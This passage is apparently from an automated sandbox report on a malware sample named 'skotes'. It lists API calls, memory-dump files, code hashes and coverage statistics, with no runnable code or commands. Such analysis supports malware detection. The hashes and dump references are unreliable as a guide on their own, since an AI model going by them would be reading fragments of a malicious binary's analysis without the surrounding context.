                                                                                                                control_flow_graph 351 7bd82f-7bd83a 352 7bd848-7bd84e 351->352 353 7bd83c-7bd846 351->353 355 7bd850-7bd851 352->355 356 7bd867-7bd878 RtlAllocateHeap 352->356 353->352 354 7bd87c-7bd887 call 7b75f6 353->354 360 7bd889-7bd88b 354->360 355->356 357 7bd87a 356->357 358 7bd853-7bd85a call 7b9dc0 356->358 357->360 358->354 364 7bd85c-7bd865 call 7b8e36 358->364 364->354 364->356
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,007BEE3F,?,00000004,00000000,?,?), ref: 007BD870
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 832214f4bdea32e57548c8147dd9765634ba2fea37819d3877a466926312691f
                                                                                                                • Instruction ID: 0a43c6ccd141d0612e2e6ff7268a44ffffa8c57c2c7ee50c337d6d6f482bfd2b
                                                                                                                • Opcode Fuzzy Hash: 832214f4bdea32e57548c8147dd9765634ba2fea37819d3877a466926312691f
                                                                                                                • Instruction Fuzzy Hash: 84F02732605124A6EB312A76DC05BDB3759DF817B2B288021FD08EB191FA2CEC0086E1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID: v{
                                                                                                                • API String ID: 3213747228-1518592600
                                                                                                                • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                • Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
                                                                                                                • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                • Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                • String ID:
                                                                                                                • API String ID: 32384418-0
                                                                                                                • Opcode ID: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
                                                                                                                • Instruction ID: ff67522a08937435a8a55695b149d02fc572c86e0c9c8ba664eee9b9bf842f70
                                                                                                                • Opcode Fuzzy Hash: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
                                                                                                                • Instruction Fuzzy Hash: 4AA104B0A41609DFDF11EF68D948B5AB7B8FF14B20F048129E815D7241EB39EA05CBD1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                • String ID:
                                                                                                                • API String ID: 531285432-0
                                                                                                                • Opcode ID: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
                                                                                                                • Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
                                                                                                                • Opcode Fuzzy Hash: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
                                                                                                                • Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                • String ID: 8"~$`'~
                                                                                                                • API String ID: 3903695350-10081231
                                                                                                                • Opcode ID: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
                                                                                                                • Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
                                                                                                                • Opcode Fuzzy Hash: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
                                                                                                                • Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.1%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1936
                                                                                                                Total number of Limit Nodes:11
